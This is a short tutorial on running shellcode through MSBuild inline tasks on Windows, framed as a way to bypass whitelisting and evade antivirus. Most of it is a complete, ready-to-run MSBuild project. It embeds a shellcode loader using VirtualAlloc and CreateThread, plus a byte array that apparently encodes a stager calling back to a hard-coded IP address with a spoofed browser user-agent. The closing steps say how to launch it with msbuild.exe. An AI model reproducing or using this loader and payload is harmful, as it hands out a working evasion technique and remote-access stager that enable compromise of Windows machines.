Achieve effect
principle
Use MSBuild To Do More
can be simply understood as the msbuild command under windows can execute files with a specific format. A new feature "Inline Tasks" is supported in .NET Framework 4.0, which is included in the element UsingTask, which can be used to execute c# code in xml files.
use
Because this method does not limit the file extension, as long as the content format meets the requirements. Therefore, almost all shellcodes can be executed by bypassing the whitelist detection, which can achieve the anti-kill effect to a certain extent.
File reference
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Runtime.InteropServices;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
public override bool Execute()
{
byte[] shellcode = new byte[837] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0xa4, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0xbb, 0x01, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0x50, 0xe9, 0x8c, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x32, 0xc0, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x68, 0x80, 0x33, 0x00, 0x00, 0x89, 0xe0, 0x6a, 0x04, 0x50, 0x6a, 0x1f, 0x56, 0x68, 0x75, 0x46, 0x9e, 0x86, 0xff, 0xd5, 0x5f, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xca, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x75, 0x07, 0x58, 0x50, 0xe9, 0x7b, 0xff, 0xff, 0xff, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x6f, 0xff, 0xff, 0xff, 0x2f, 0x53, 0x6b, 0x39, 0x65, 0x00, 0x93, 0xf0, 0x7f, 0xc6, 0x49, 0xc8, 0xa6, 0x78, 0xe7, 0x72, 0x7f, 0x95, 0xd6, 0x5a, 0xaf, 0x0a, 0xe6, 0xbe, 0xa9, 0x32, 0x7a, 0x6a, 0xb8, 0x37, 0x02, 0xc8, 0xa2, 0xea, 0xc6, 0x54, 0x47, 0x96, 0xbe, 0xe5, 0xb4, 0x07, 0x4d, 0x93, 0x72, 0x87, 0x10, 0x86, 0xe1, 0xea, 0x46, 0x62, 0x2d, 0x07, 0xe1, 0x84, 0xec, 0xe2, 0x4b, 0xf9, 0x0e, 0x08, 0x1a, 0xcb, 0x4b, 0x88, 0x42, 0x7d, 0x58, 0x19, 0xb9, 0x43, 0xee, 0x0c, 0x49, 0x5d, 0xf5, 0x4b, 0x5c, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x39, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x31, 0x3b, 0x20, 0x57, 0x4f, 0x57, 0x36, 0x34, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x35, 0x2e, 0x30, 0x3b, 0x20, 0x41, 0x76, 0x61, 0x6e, 0x74, 0x20, 0x42, 0x72, 0x6f, 0x77, 0x73, 0x65, 0x72, 0x29, 0x0d, 0x0a, 0x00, 0xf4, 0xd2, 0xd8, 0x55, 0xc7, 0x33, 0x93, 0x3c, 0xda, 0x85, 0x1b, 0x7c, 0x41, 0xbf, 0xf5, 0x7c, 0xe5, 0x66, 0xf2, 0x6e, 0x00, 0x71, 0xfe, 0x58, 0x6a, 0xd1, 0x03, 0x3a, 0xb4, 0x88, 0xee, 0xf8, 0xb8, 0xb7, 0x57, 0xf4, 0x33, 0xba, 0x96, 0xfd, 0x90, 0xdd, 0x0f, 0x7f, 0xcf, 0x30, 0x6e, 0x67, 0xe6, 0x31, 0x27, 0x8c, 0xf0, 0xe0, 0x3c, 0xe6, 0xf8, 0x53, 0xad, 0x6d, 0xcf, 0x7d, 0x2a, 0x5d, 0x86, 0x61, 0x4e, 0xe3, 0xae, 0x9e, 0xaf, 0x41, 0xbd, 0x01, 0x32, 0xdd, 0x9e, 0x71, 0x4d, 0xfe, 0x57, 0xfc, 0x0a, 0x40, 0x73, 0x46, 0x4b, 0xb5, 0x02, 0x0f, 0x39, 0xe4, 0xdb, 0x81, 0x09, 0xb4, 0x6a, 0xd7, 0x96, 0x0c, 0x03, 0x4b, 0x0b, 0xe8, 0x5e, 0xd4, 0xa8, 0x31, 0x44, 0x82, 0xaf, 0xf5, 0x8f, 0x24, 0xb6, 0x05, 0x77, 0x4c, 0xb4, 0x05, 0x8b, 0x97, 0x37, 0x93, 0x43, 0x53, 0xea, 0xea, 0x11, 0xcf, 0xda, 0x43, 0xdc, 0x34, 0x1c, 0xa0, 0x2c, 0x27, 0x0b, 0x60, 0xfa, 0x15, 0x63, 0xa8, 0x1f, 0x8f, 0xd2, 0x71, 0xef, 0x55, 0x04, 0xd3, 0x60, 0x00, 0xbf, 0x1f, 0xd8, 0xb7, 0xb5, 0x86, 0x31, 0x32, 0x98, 0x2f, 0xdc, 0x5a, 0xdf, 0x08, 0x48, 0x85, 0x9e, 0x80, 0x39, 0x74, 0x30, 0x09, 0x81, 0x07, 0x57, 0x39, 0x6b, 0x9c, 0xbe, 0x15, 0xdf, 0x4b, 0x0b, 0xe3, 0xf3, 0xb0, 0x05, 0xab, 0xbd, 0xc1, 0xfe, 0x02, 0x97, 0x14, 0xd4, 0xfd, 0x8e, 0xc8, 0xb9, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0x89, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x32, 0x34, 0x2e, 0x31, 0x33, 0x38, 0x00, 0x12, 0x34, 0x56, 0x78 };
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
other
The msbuild command must be in the specified folder and the version must be 4.0.
The difference between the two folders in the figure below is that if your shellcode is 64-bit, choose Framework64, and vice versa.
Select version 4.0 to enter the folder.
You can execute the msbuild command in this folder.
The command format ismsbuild file_path